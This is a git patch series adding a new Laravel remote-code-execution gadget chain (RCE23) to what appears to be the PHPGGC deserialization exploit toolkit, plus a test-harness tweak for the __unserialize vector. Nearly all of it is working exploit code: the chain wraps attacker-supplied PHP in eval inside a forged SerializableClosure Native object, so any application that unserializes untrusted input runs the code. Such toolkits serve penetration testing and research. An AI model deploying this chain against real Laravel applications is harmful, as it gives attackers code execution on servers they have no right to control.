From 254c27c811fb1ea140b47e5bb8f3f97a029b4e4a Mon Sep 17 00:00:00 2001
From: maple3142 <kirby741852963@gmail.com>
Date: Wed, 26 Nov 2025 00:32:22 +0800
Subject: [PATCH 1/2] Add Laravel/RCE3

---
 gadgetchains/Laravel/RCE/23/chain.php   | 20 ++++++++++++++++++++
 gadgetchains/Laravel/RCE/23/gadgets.php | 23 +++++++++++++++++++++++
 2 files changed, 43 insertions(+)
 create mode 100644 gadgetchains/Laravel/RCE/23/chain.php
 create mode 100644 gadgetchains/Laravel/RCE/23/gadgets.php

diff --git a/gadgetchains/Laravel/RCE/23/chain.php b/gadgetchains/Laravel/RCE/23/chain.php
new file mode 100644
index 00000000..ea1a6eb4
--- /dev/null
+++ b/gadgetchains/Laravel/RCE/23/chain.php
@@ -0,0 +1,20 @@
+<?php
+
+namespace GadgetChain\Laravel;
+
+class RCE23 extends \PHPGGC\GadgetChain\RCE\PHPCode
+{
+    public static $version = 'v8.62.0 <= ?';
+    public static $vector = '__unserialize';
+    public static $author = 'maple3142';
+
+    public function generate(array $parameters)
+    {
+        // the code is executed in the expression of a return statement
+        // so eval is needed to handle the case of multiple statements
+        $code = $parameters['code'] . "exit;";
+        $escaped_code = "'" . addcslashes($code, "\\'") . "'";
+        $expr = "eval($escaped_code)";
+        return new \Laravel\SerializableClosure\Serializers\Native($expr);
+    }
+}
diff --git a/gadgetchains/Laravel/RCE/23/gadgets.php b/gadgetchains/Laravel/RCE/23/gadgets.php
new file mode 100644
index 00000000..1a00271e
--- /dev/null
+++ b/gadgetchains/Laravel/RCE/23/gadgets.php
@@ -0,0 +1,23 @@
+<?php
+
+namespace Laravel\SerializableClosure\Serializers {
+    class Native
+    {
+        public $code;
+
+        public function __construct($code)
+        {
+            $this->code = $code;
+        }
+
+        // target: https://github.com/laravel/serializable-closure/blob/cb291e4c998ac50637c7eeb58189c14f5de5b9dd/src/Serializers/Native.php#L167-L205
+
+        public function __serialize()
+        {
+            return [
+                'use' => false,
+                'function' => $this->code
+            ];
+        }
+    }
+}

From fde0e614dd6a9cb6298b47b8727b3af04a185ad0 Mon Sep 17 00:00:00 2001
From: maple3142 <kirby741852963@gmail.com>
Date: Wed, 26 Nov 2025 00:32:57 +0800
Subject: [PATCH 2/2] Add __unserialize to test_payload

---
 lib/test_payload.php | 1 +
 1 file changed, 1 insertion(+)

diff --git a/lib/test_payload.php b/lib/test_payload.php
index d2d6b9cc..14df06c2 100755
--- a/lib/test_payload.php
+++ b/lib/test_payload.php
@@ -43,6 +43,7 @@
 	    break;
 	case '__destruct':
 	case '__wakeup':
+	case '__unserialize':
 		$payload = unserialize($payload);
         break;
     default: